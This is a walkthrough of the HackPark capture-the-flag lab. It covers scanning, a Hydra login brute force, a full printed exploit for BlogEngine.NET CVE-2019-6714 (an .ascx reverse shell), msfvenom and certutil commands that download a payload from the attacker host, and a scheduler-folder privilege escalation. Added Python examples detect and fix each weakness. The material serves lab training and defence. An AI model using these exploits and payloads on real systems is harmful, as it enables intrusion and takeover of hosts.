
HackPark walkthrough

$ nmap -p0-65535 10.10.88.187 -T5   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 17:01 IST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.73% done; ETC: 17:06 (0:03:52 remaining)
Nmap scan report for 10.10.88.187
Host is up (0.17s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 216.20 seconds
$ nmap -sV -sC -p80,3389 10.10.88.187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 17:07 IST
Nmap scan report for 10.10.88.187
Host is up (0.17s latency).

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2021-06-30T11:22:49
|_Not valid after:  2021-12-30T11:22:49
|_ssl-date: 2021-07-01T11:37:45+00:00; -4s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -4s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.07 seconds

When we inspect the pages, nothing fruitful is found.

Injection attacks on the input forms did not yield any fruitful results either:

  • Comment Form

[screenshot: CommentForm, commentforminput.png]

  • Contact Form

[screenshot: contact.png, contactforminput.png]

  • Login Form

[screenshot: loginform.png]

From the URL, we can observe that one of the parameters refers to admin. Let's use admin as the username and try a brute-force attack.

Using Burp

[screenshot: intruder.png]

[screenshot: redirections.png]

Using one of the password lists from SecLists, we got the password 1qaz2wsx.

[screenshot: password.png]

Using Hydra

$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/worst-passwords-2017-top100-slashdata.txt 10.10.88.187 http-post-form '/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=qRY6dWng1F0cvqSV%2B4mQfRmxND5Ksw%2F6QtVhc%2FlkK3Vze3sRlKmX4tRKwROr3YZ%2Fa%2FwPPHHBDTmbZMGyqx3xjyB8518U%2F3xHggxcrZ%2BsYOK2OOyWTkNa1cwmJuDw1zkcwpzMRThR1PK3cMJ1%2BRZVuFz41QR4mLQ9jiBDS6rJG0oLSXO9trFqrxZhCzdGQ9NikJJhbEbkNLQdSVipgvGTYZ1lXqYfp%2BtJ4F43RqGZFrbPC6%2B2qFb7DPSU%2BlTzrX9wghEicFDp5T7RjuPMpXBgsylp7dSQB8ytzrrj0T%2BwfKQQuo1vJrLdUx%2Ff64MiEMuQ1pm%2FkGp7Hdu71TpshTI3D8SfmTCOXBPJEkztx%2FU8SZ4HOTiy&__EVENTVALIDATION=R%2BihqyiDlyMMnTQiDQbY83J%2FICfBn9zcT1n09t%2FNzwUShryVjKW8K7ix2NU2GcsolWVjNwNUPoEFuONe7nCT3ZY9ul6zQiwlKAn53pdKEiUv9w4PXuXvzemSpYtaeUxuw%2FhRD%2B4vf7Is5h5%2Fdw4mLLawu9Vk8MKPMEfrI226GwQVZCei&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-01 19:53:13
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100 login tries (l:1/p:100), ~7 tries per task
[DATA] attacking http-post-form://10.10.88.187:80/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=qRY6dWng1F0cvqSV%2B4mQfRmxND5Ksw%2F6QtVhc%2FlkK3Vze3sRlKmX4tRKwROr3YZ%2Fa%2FwPPHHBDTmbZMGyqx3xjyB8518U%2F3xHggxcrZ%2BsYOK2OOyWTkNa1cwmJuDw1zkcwpzMRThR1PK3cMJ1%2BRZVuFz41QR4mLQ9jiBDS6rJG0oLSXO9trFqrxZhCzdGQ9NikJJhbEbkNLQdSVipgvGTYZ1lXqYfp%2BtJ4F43RqGZFrbPC6%2B2qFb7DPSU%2BlTzrX9wghEicFDp5T7RjuPMpXBgsylp7dSQB8ytzrrj0T%2BwfKQQuo1vJrLdUx%2Ff64MiEMuQ1pm%2FkGp7Hdu71TpshTI3D8SfmTCOXBPJEkztx%2FU8SZ4HOTiy&__EVENTVALIDATION=R%2BihqyiDlyMMnTQiDQbY83J%2FICfBn9zcT1n09t%2FNzwUShryVjKW8K7ix2NU2GcsolWVjNwNUPoEFuONe7nCT3ZY9ul6zQiwlKAn53pdKEiUv9w4PXuXvzemSpYtaeUxuw%2FhRD%2B4vf7Is5h5%2Fdw4mLLawu9Vk8MKPMEfrI226GwQVZCei&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.88.187   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-01 19:53:18

Username: admin Password: 1qaz2wsx
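The hydra run above leaves a very recognisable pattern on the server side: one client IP sending dozens of POSTs to /Account/login.aspx within seconds, each answered with the re-rendered form (HTTP 200, the "Login failed" string hydra keys on), then a 302 redirect to ReturnURL once the password is right. The following Python script is an added example, not part of the original walkthrough, that pulls that pattern out of IIS W3C logs; the log lines, the attacker address 10.11.39.244 inside them, and the threshold are constructed for the demonstration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed IIS W3C log excerpt (not taken from the target). 10.11.39.244 plays the
# attacking host: thirty failed POSTs in a few seconds, then one 302 redirect when the
# right password lands. 192.0.2.7 is a normal user who logs in once.
_HEADER = (
    "#Software: Microsoft Internet Information Services 8.5\n"
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username "
    "c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken\n"
)
_FAILED = "".join(
    f"2021-07-01 14:23:{13 + i // 10:02d} 10.10.88.187 POST /Account/login.aspx "
    f"ReturnURL=%2fadmin%2f 80 - 10.11.39.244 Mozilla/5.0 200 0 0 95\n"
    for i in range(30)
)
SAMPLE_LOG = (
    _HEADER
    + "2021-07-01 14:23:10 10.10.88.187 GET /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 10.11.39.244 Mozilla/5.0 200 0 0 120\n"
    + _FAILED
    + "2021-07-01 14:23:18 10.10.88.187 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 10.11.39.244 Mozilla/5.0 302 0 0 130\n"
    + "2021-07-01 14:25:00 10.10.88.187 POST /Account/login.aspx ReturnURL=%2fadmin%2f 80 - 192.0.2.7 Mozilla/5.0 302 0 0 128\n"
)


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def find_login_bruteforce(text, login_path="/Account/login.aspx",
                          threshold=20, window=timedelta(seconds=60)):
    """Flag client IPs that sent at least `threshold` failed login POSTs inside `window`.

    A failed BlogEngine.NET login re-renders the form (HTTP 200); a success answers
    302 to ReturnURL. A 302 from an IP that was already flagged therefore means the
    brute force most likely succeeded and the account should be treated as compromised.
    """
    recent = defaultdict(deque)   # per-IP timestamps of failed POSTs still inside the window
    flagged = {}
    for rec in parse_iis_log(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != login_path.lower():
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        ip = rec["c-ip"]
        if rec["sc-status"] == "200":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:      # drop failures that fell out of the window
                q.popleft()
            if len(q) >= threshold:
                entry = flagged.setdefault(ip, {"failed_in_window": 0, "succeeded": False})
                entry["failed_in_window"] = max(entry["failed_in_window"], len(q))
        elif rec["sc-status"] == "302" and ip in flagged:
            flagged[ip]["succeeded"] = True
    return flagged


if __name__ == "__main__":
    for ip, info in find_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failed_in_window']} failed logins in window, "
              f"success afterwards: {info['succeeded']}")
```

The same logic applies unchanged to real IIS logs under %SystemDrive%\inetpub\logs\LogFiles, provided the site logs the default W3C fields; the only tuning is the threshold, which should sit well above what a person mistyping a password produces in a minute.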

We can use these credentials in the login form and will be greeted with the Administrator Dashboard.

[screenshot: administratordashboard.png]

RDP is not vulnerable:

$ nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.10.88.187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 19:07 IST
Nmap scan report for 10.10.88.187
Host is up (0.36s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS

Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds

We could brute-force RDP as well, but that may lead to account lockouts. Let's keep this as a last resort.

Examining the Administrator Dashboard, on the About page we can find the BlogEngine.NET version number, 3.3.6.0.

[screenshot: versionnumber.png]

With some Google searching, we find that this version is vulnerable to directory traversal leading to remote code execution, CVE-2019-6714.

Let's use this exploit code to get our shell.

Payload Code:

# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
# Date: 02-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
# Version: <= 3.3.6
# Tested on: Windows 2016 Standard / IIS 10.0
# CVE : CVE-2019-6714

/*
 * CVE-2019-6714
 *
 * Path traversal vulnerability leading to remote code execution.  This
 * vulnerability affects BlogEngine.NET versions 3.3.6 and below.  This
 * is caused by an unchecked "theme" parameter that is used to override
 * the default theme for rendering blog pages.  The vulnerable code can
 * be seen in this file:
 *
 * /Custom/Controls/PostList.ascx.cs
 *
 * Attack:
 *
 * First, we set the TcpClient address and port within the method below to
 * our attack host, who has a reverse tcp listener waiting for a connection.
 * Next, we upload this file through the file manager.  In the current (3.3.6)
 * version of BlogEngine, this is done by editing a post and clicking on the
 * icon that looks like an open file in the toolbar.  Note that this file must
 * be uploaded as PostView.ascx. Once uploaded, the file will be in the
 * /App_Data/files directory off of the document root. The admin page that
 * allows upload is:
 *
 * http://10.10.10.10/admin/app/editor/editpost.cshtml
 *
 *
 * Finally, the vulnerability is triggered by accessing the base URL for the
 * blog with a theme override specified like so:
 *
 * http://10.10.10.10/?theme=../../App_Data/files
 *
 */

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
	static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
		using(System.IO.Stream stream = client.GetStream()) {
			using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
				streamWriter = new System.IO.StreamWriter(stream);
						
				StringBuilder strInput = new StringBuilder();

				System.Diagnostics.Process p = new System.Diagnostics.Process();
				p.StartInfo.FileName = "cmd.exe";
				p.StartInfo.CreateNoWindow = true;
				p.StartInfo.UseShellExecute = false;
				p.StartInfo.RedirectStandardOutput = true;
				p.StartInfo.RedirectStandardInput = true;
				p.StartInfo.RedirectStandardError = true;
				p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
				p.Start();
				p.BeginOutputReadLine();

				while(true) {
					strInput.Append(rdr.ReadLine());
					p.StandardInput.WriteLine(strInput);
					strInput.Remove(0, strInput.Length);
				}
			}
		}
    	}
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
   	StringBuilder strOutput = new StringBuilder();

       	if (!String.IsNullOrEmpty(outLine.Data)) {
       		try {
                	strOutput.Append(outLine.Data);
                    	streamWriter.WriteLine(strOutput);
                    	streamWriter.Flush();
                } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

Set the TcpClient address and port in the payload to your listener, and save the payload as PostView.ascx.

Upload the file through the post editor at this URL:

http://10.10.88.187/admin/app/editor/editpost.cshtml

[screenshot: editpage.png]

[screenshot: uploadedfile.png]

Start the listener and browse to this URL to receive the reverse shell on it:

http://10.10.88.187/?theme=../../App_Data/files

[screenshot: listnerurl.png]

[screenshot: revshell.png]
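The exploit works because the theme value from the query string is joined onto the themes directory without being checked, so "../../" climbs into App_Data/files, where the uploaded PostView.ascx sits, and the control is rendered from there. The Python below is an added example, not code from the walkthrough or from BlogEngine.NET, that shows the unchecked join beside a hardened resolver and a query-string check that a request filter or log review could apply; the THEMES_ROOT path and the Custom/Themes layout are assumptions made for the example.

```python
import os
import re
from urllib.parse import parse_qs, unquote

# Assumed on-disk layout for the example; the exploit's "../../App_Data/files" climbs
# exactly two levels out of the themes directory.
THEMES_ROOT = "/inetpub/wwwroot/blog/Custom/Themes"
DEFAULT_THEME = "Standard"
_THEME_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")   # what a theme folder name may look like


def naive_theme_dir(theme, root=THEMES_ROOT):
    """The unchecked pattern: the ?theme= value is joined straight onto the themes root,
    so '..' segments walk out of it (the bug class behind CVE-2019-6714)."""
    return os.path.normpath(os.path.join(root, theme))


def safe_theme_dir(theme, root=THEMES_ROOT, installed=None):
    """Hardened form: allow-list the characters, confirm the resolved path is still under
    `root`, optionally require the theme to be installed; otherwise use the default."""
    fallback = os.path.join(root, DEFAULT_THEME)
    if not theme or not _THEME_NAME.match(theme):
        return fallback
    candidate = os.path.normpath(os.path.join(root, theme))
    # Belt and braces: even if the allow-list were loosened later, never leave root.
    if os.path.commonpath([os.path.normpath(root), candidate]) != os.path.normpath(root):
        return fallback
    if installed is not None and theme not in installed:
        return fallback
    return candidate


def looks_like_traversal(query):
    """Detection side: True if a request's query string carries a theme value holding a
    '..' segment, an absolute path or a drive letter, after peeling nested %-encoding."""
    decoded = query
    for _ in range(3):                     # "%252e" style double encoding is common
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    for value in parse_qs(decoded, keep_blank_values=True).get("theme", []):
        norm = value.replace("\\", "/")    # IIS accepts either separator
        if ".." in norm.split("/") or norm.startswith("/") or re.match(r"^[A-Za-z]:", norm):
            return True
    return False


if __name__ == "__main__":
    hostile = "../../App_Data/files"
    print("naive :", naive_theme_dir(hostile))
    print("safe  :", safe_theme_dir(hostile))
    print("flag  :", looks_like_traversal("theme=..%2F..%2FApp_Data%2Ffiles"))
```

The allow-list is the real fix; the commonpath check only guards against a future loosening of it, and the query-string check is what you would run over IIS logs or in a request filter to spot attempts against an instance that has not been patched yet.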

Getting a proper, stable shell

Create a payload using msfvenom:

$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.39.244 LPORT=9866 -f exe -o revshell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: revshell.exe

Copy it to the target:

c:\Users\Public>certutil -urlcache -f http://10.11.39.244:8991/revshell.exe revshell.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

Grabbing the shell

[screenshot: stableshell.png]


Using winPEAS to check for possible privilege-escalation vectors

Running winPEAS, we learn that the SystemScheduler folder grants read/write access to Everyone.

[screenshot: EveryoneWriteread.png]

We can try to stop the service so that we can perform DLL-hijacking privilege escalation.

[screenshot: schdcantstop.png]

After searching through the different logs in the SystemScheduler folder, we learn that Message.exe is restarted every 30 seconds.

[screenshot: logs3.png]

[screenshot: messageexe.png]
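What turns the SystemScheduler folder into a privilege-escalation path is the combination of a service that relaunches Message.exe every 30 seconds and an ACL that lets Everyone write into the folder it runs from. The Python below is an added example, not from the walkthrough or from winPEAS, that parses icacls output for a service folder, flags write-class rights granted to low-privilege principals, and builds the icacls command that restores a sane ACL; the path C:\example\SystemScheduler and the ACEs in the sample are constructed.

```python
import re

# Constructed icacls output for the example (path and ACEs are made up to mirror the
# winPEAS finding, not copied from the target).
SAMPLE_PATH = r"C:\example\SystemScheduler"
SAMPLE_ICACLS = r"""C:\example\SystemScheduler Everyone:(OI)(CI)(F)
                           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                           BUILTIN\Administrators:(I)(OI)(CI)(F)
                           BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every local user belongs to; write rights for them on a service folder
# mean anyone can swap the binary the scheduler relaunches.
LOW_PRIV_PRINCIPALS = {
    "everyone", "builtin\\users", "users", "authenticated users",
    "nt authority\\authenticated users", "nt authority\\interactive",
}
# icacls rights that allow replacing or altering files: full, modify, write,
# write-data/create-file, append-data/create-subdir, delete, write-DAC, take-ownership.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "WDAC", "WO"}

_ACE = re.compile(r"^(?P<identity>.+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(path, text):
    """Return [(identity, [rights...])] from `icacls <path>` output. The first line
    carries the path before its first ACE; continuation lines are indented ACEs."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        m = _ACE.match(line)
        if not m:
            continue
        # "(OI)(CI)(RX,W)" -> ["OI", "CI", "RX", "W"]
        rights = [r for grp in re.findall(r"\(([^)]*)\)", m.group("rights"))
                  for r in grp.split(",") if r]
        aces.append((m.group("identity"), rights))
    return aces


def weak_aces(path, text):
    """ACEs that give a low-privilege principal any write-class right on the folder."""
    return [(who, rights) for who, rights in parse_icacls(path, text)
            if who.lower() in LOW_PRIV_PRINCIPALS and set(rights) & WRITE_RIGHTS]


def remediation_command(path):
    """icacls command that drops inheritance and leaves Users with read/execute only."""
    return (f'icacls "{path}" /inheritance:r '
            '/grant:r "NT AUTHORITY\\SYSTEM:(OI)(CI)F" '
            '"BUILTIN\\Administrators:(OI)(CI)F" "BUILTIN\\Users:(OI)(CI)RX"')


if __name__ == "__main__":
    for who, rights in weak_aces(SAMPLE_PATH, SAMPLE_ICACLS):
        print(f"weak ACE: {who} has {','.join(rights)} on {SAMPLE_PATH}")
    print(remediation_command(SAMPLE_PATH))
```

Feed it the output of `icacls` run against the directory of each service's binary path (the ImagePath from the service configuration); a hit means the service account's privileges are effectively available to whoever can write there, which is exactly what the next step of the walkthrough uses.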

Since the SystemScheduler folder has world read/write access, let's create a payload for a privileged shell.

[screenshot: msfpayloadprivshell.png]

Uploading the shell to the target

[screenshot: uploadprivshell.png]

On the listener, we get the connection.

[screenshot: administrator.png]

Getting the user flag

[screenshot: userflag.png]

Getting the root flag

[screenshot: rootflag.png]

[screenshot: proof.png]

The host is vulnerable to the Juicy Potato attack too.

[screenshot: juicypotato.png]

More about the Juicy Potato attack can be found in the Alfred walkthrough.